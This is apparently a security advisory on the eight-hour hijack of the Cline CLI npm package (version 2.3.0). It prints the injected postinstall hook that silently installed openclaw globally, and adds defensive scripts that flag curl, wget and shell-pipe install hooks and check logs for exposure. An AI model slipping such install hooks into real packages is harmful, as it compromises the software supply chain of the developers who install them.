Cline CLI npm Package Hijacked for 8 Hours
Attackers used a compromised Cline CLI npm publish token to publish a malicious version 2.3.0 on February 17, 2026; it remained available from 3:26 AM PT to 11:30 AM PT. The version installed OpenCLAW via a postinstall script. Developers who installed the CLI during this window face a potential supply chain risk.
Cline is an AI coding assistant for VS Code and JetBrains. The attackers modified only package.json and left the core files untouched, which preserved the package's functionality while injecting an unauthorized dependency.
The Cline team detected the compromise, released a clean 2.4.0, and deprecated 2.3.0. They revoked the stolen token and switched publishing to OIDC provenance via GitHub Actions.
Attack Timeline
3:26 AM PT: Malicious cline@2.3.0 published
11:23 AM PT: Clean cline@2.4.0 released (8 hours later)
11:30 AM PT: 2.3.0 deprecated from npm registry

Compromised behavior:

```sh
npm install -g cline@2.3.0
```

Silently runs:

```sh
npm install -g openclaw@latest
```

OpenCLAW appears legitimate but represents an unauthorized supply chain insertion.
Technical Details
The attackers targeted the publish token specifically. There was no code execution beyond the npm install step. The VS Code extension and JetBrains plugin were unaffected.
Malicious package.json snippet:

```json
{
  "scripts": {
    "postinstall": "npm install -g openclaw@latest"
  }
}
```
Core CLI binary (dist/cli.mjs) remained identical to 2.2.3.
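The hijack lived entirely in the manifest's lifecycle scripts, which npm runs automatically on install. The following Node.js script is an added example, not Cline's code, showing the "check package.json before install" step in practice: it parses a manifest, lists any preinstall/install/postinstall hooks, and flags commands that install another global package, fetch remote content, or pipe into a shell. The two manifests are constructed for the demo; the first mirrors the shape of the hijacked 2.3.0 described above, and the pattern list is a starting point, not a complete signature set.

```javascript
// Added example (not Cline's code): review a package manifest's lifecycle
// scripts before installing. npm executes these hooks during `npm install`,
// so anything in them runs with the installing user's privileges.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];

// Constructed list of command shapes that deserve a manual look.
const SUSPICIOUS = [
  { label: 'installs another global package', re: /\bnpm\s+(?:i|install)\b.*\s(?:-g|--global)\b/ },
  { label: 'fetches remote content',          re: /\b(?:curl|wget)\b/ },
  { label: 'pipes into a shell',              re: /\|\s*(?:sh|bash)\b|\bsh\s+-c\b/ },
  { label: 'runs inline JavaScript',          re: /\bnode\s+-e\b/ },
];

// Returns the hooks found plus a verdict: 'OK' (no hooks, or only benign ones)
// or 'REVIEW' (at least one hook matched a suspicious pattern).
function inspectManifest(manifestText) {
  const pkg = JSON.parse(manifestText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const cmd = String(scripts[hook]);
    const reasons = SUSPICIOUS.filter((p) => p.re.test(cmd)).map((p) => p.label);
    findings.push({ hook, cmd, reasons });
  }
  const verdict = findings.some((f) => f.reasons.length > 0) ? 'REVIEW' : 'OK';
  return { name: pkg.name, version: pkg.version, findings, verdict };
}

// Constructed manifests for the demo. HIJACKED mirrors the postinstall hook
// reported for cline@2.3.0; BENIGN has only build/test scripts.
const HIJACKED = JSON.stringify({
  name: 'cline',
  version: '2.3.0',
  scripts: { postinstall: 'npm install -g openclaw@latest' },
});
const BENIGN = JSON.stringify({
  name: 'cline',
  version: '2.4.0',
  scripts: { build: 'tsc', test: 'vitest' },
});

console.log(JSON.stringify(inspectManifest(HIJACKED), null, 2)); // verdict: REVIEW
console.log(JSON.stringify(inspectManifest(BENIGN), null, 2));   // verdict: OK
```

To feed it a real manifest without installing anything, fetch the published metadata first (for example `npm view <package>@<version> scripts --json`) and pass that object's JSON text in, or install with `npm install --ignore-scripts` and review the extracted package.json by hand before running any hooks.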
Immediate Actions Required
For affected developers:

```sh
# Update immediately
npm install -g cline@latest
cline --version   # Verify 2.4.0+

# Remove injected package
npm uninstall -g openclaw

# Verify no persistence
npm list -g --depth=0 | grep openclaw
```

Verify the installation window: check npm install logs for February 17, 3:26 to 11:30 AM PT.
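The three checks above (was the CLI installed inside the window, is openclaw present globally, is the installed cline older than 2.4.0) are easy to get wrong across time zones and machines, so here is an added Node.js example, not Cline's code, that scripts them. It converts the Pacific-time window to UTC (February 17 is Pacific Standard Time, UTC-8), selects npm debug logs whose file names fall inside it, and parses `npm list -g --depth=0` output into the remediation actions still needed. The log file name format (`<UTC timestamp with underscores>-debug-0.log` under `~/.npm/_logs`) is assumed from recent npm versions; the log names, list output and the openclaw version number are constructed sample data.

```javascript
// Added example (not Cline's code): automate the post-incident checks.
// The window is 3:26-11:30 AM PT on 2026-02-17. February is PST (UTC-8),
// so that is 11:26Z to 19:30Z; Date.parse handles the offset for us.
const WINDOW_START = Date.parse('2026-02-17T03:26:00-08:00');
const WINDOW_END = Date.parse('2026-02-17T11:30:00-08:00');

// Assumed npm debug log name, e.g. 2026-02-17T15_12_47_903Z-debug-0.log
// (the run's UTC timestamp with ':' and '.' replaced by '_').
function logTimestamp(fileName) {
  const m = /^(\d{4}-\d{2}-\d{2})T(\d{2})_(\d{2})_(\d{2})_(\d{3})Z/.exec(fileName);
  return m ? Date.parse(`${m[1]}T${m[2]}:${m[3]}:${m[4]}.${m[5]}Z`) : null;
}

// Keep only log files written during the exposure window.
function logsInWindow(fileNames) {
  return fileNames.filter((f) => {
    const t = logTimestamp(f);
    return t !== null && t >= WINDOW_START && t <= WINDOW_END;
  });
}

// Did a log body record an install of the hijacked version?
function mentionsHijacked(logText) {
  return /\bcline@2\.3\.0\b/.test(logText);
}

// Parse `npm list -g --depth=0` tree lines ("├── cline@2.3.0" or the ASCII
// form "+-- cline@2.3.0") into { name: version }. Scoped names are handled.
function parseGlobalList(text) {
  const installed = {};
  const re = /^(?:[├└]──|[+`]--)\s+(@?[^@\s]+)@(\S+)/;
  for (const line of text.split('\n')) {
    const m = re.exec(line.trim());
    if (m) installed[m[1]] = m[2];
  }
  return installed;
}

// Minimal numeric semver comparison (pre-release suffix ignored).
function compareSemver(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Turn the global package list into the concrete commands still required.
function assessGlobals(listOutput) {
  const installed = parseGlobalList(listOutput);
  const actions = [];
  if ('openclaw' in installed) actions.push('npm uninstall -g openclaw');
  if (installed.cline && compareSemver(installed.cline, '2.4.0') < 0) {
    actions.push('npm install -g cline@latest');
  }
  return { installed, actions, clean: actions.length === 0 };
}

// Constructed sample data for the demo.
const SAMPLE_LOGS = [
  '2026-02-17T10_58_02_110Z-debug-0.log', // 02:58 PT, before the window
  '2026-02-17T15_12_47_903Z-debug-0.log', // 07:12 PT, inside the window
  '2026-02-17T19_45_00_000Z-debug-0.log', // 11:45 PT, after deprecation
  'README.md',                            // not a log
];
const SAMPLE_LOG_BODY = '5 verbose argv "install" "-g" "cline@2.3.0"'; // constructed line
const SAMPLE_LIST = [
  '/usr/local/lib',
  '├── cline@2.3.0',
  '└── openclaw@1.0.0', // constructed version; not taken from the article
].join('\n');

console.log('logs to inspect:', logsInWindow(SAMPLE_LOGS));
console.log('hijacked install recorded:', mentionsHijacked(SAMPLE_LOG_BODY));
console.log('remediation:', assessGlobals(SAMPLE_LIST));
```

On a real machine, list `~/.npm/_logs`, pass the names to `logsInWindow`, read each selected file and run `mentionsHijacked` over it, then pipe the actual `npm list -g --depth=0` output into `assessGlobals`. A log timestamped inside the window that mentions cline@2.3.0 means the postinstall ran and the uninstall step is required regardless of what the global list shows today.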
Supply Chain Risk Assessment
| Risk Vector | Status | Mitigation |
|---|---|---|
| Code execution | None | Postinstall only installs package |
| Persistence | OpenCLAW npm package | Manual uninstall |
| Lateral movement | None detected | Dependency chain clean |
| Registry impact | Deprecated | npm prevents reinstall |
OpenCLAW's legitimacy is unverified. Treat it as potentially malicious until audited.
Prevention Measures Implemented
Cline response:
- Stolen npm token revoked
- Publishing migrated to OIDC + GitHub Actions
- 2FA enforced on all accounts
- Release pipeline audit completed
Broader implications:
- npm publish tokens represent single point of failure
- OIDC eliminates static token risks
- Dependency verification becomes critical
Developer Ecosystem Impact
Immediate exposure: Developers installing cline@2.3.0 during the 8-hour window
Potential vectors: Corporate npm mirrors, CI/CD pipelines
Verification needed: All environments using Cline CLI
npm Best Practices Post-Incident
Multi-factor: Enforce 2FA on all package accounts
Token hygiene: Rotate publish tokens quarterly
OIDC adoption: Eliminate static credentials
Release verification: Check package.json before install
Audit tools: Dependabot, Socket, npm audit
FAQ
When was the package compromised? February 17, 2026, 3:26 AM PT to 11:30 AM PT (8 hours).
What did the malicious version do? Its postinstall script installed the openclaw@latest package.
Were the VS Code extension or JetBrains plugin affected? No. Only the npm CLI package was compromised.
How do I confirm I am clean? `cline --version` shows 2.4.0+, and `npm uninstall -g openclaw` has been run.
What has Cline changed? The token was revoked. Publishing now uses OIDC via GitHub Actions.
Is OpenCLAW safe? Its legitimacy is unknown. Remove it immediately regardless.